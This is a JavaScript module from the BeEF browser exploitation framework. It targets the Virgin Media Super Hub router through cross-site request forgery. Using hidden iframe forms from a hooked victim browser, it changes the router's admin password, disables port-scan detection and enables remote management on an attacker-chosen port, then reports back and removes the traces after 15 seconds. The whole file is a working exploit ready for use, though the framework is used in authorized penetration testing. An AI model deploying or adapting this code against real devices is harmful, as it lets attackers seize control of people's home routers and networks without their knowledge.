beef/modules/exploits/router/virgin_superhub_csrf/command.js

//
//   Copyright 2012 Wade Alcorn wade@bindshell.net
//
//   Licensed under the Apache License, Version 2.0 (the "License");
//   you may not use this file except in compliance with the License.
//   You may obtain a copy of the License at
//
//       http://www.apache.org/licenses/LICENSE-2.0
//
//   Unless required by applicable law or agreed to in writing, software
//   distributed under the License is distributed on an "AS IS" BASIS,
//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
//   See the License for the specific language governing permissions and
//   limitations under the License.
//
beef.execute(function() {

	var gateway = '<%= @base %>'; 
	var passwd  = '<%= @password %>';
	var port    = '<%= @port %>';

	var virgin_superhub_iframe1 = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
		{'type':'hidden', 'name':'NetgearPassword', 'value':passwd},
		{'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd},
		{'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'}
	]);

	var virgin_superhub_iframe2 = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
		{'type':'hidden', 'name':'cbPortScanDetection', 'value':''}
	]);

	var virgin_superhub_iframe3 = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
		{'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'},
		{'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port}
	]);

	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

	cleanup = function() {
		document.body.removeChild(virgin_superhub_iframe1);
		document.body.removeChild(virgin_superhub_iframe2);
		document.body.removeChild(virgin_superhub_iframe3);
	}
	setTimeout("cleanup()", 15000);

});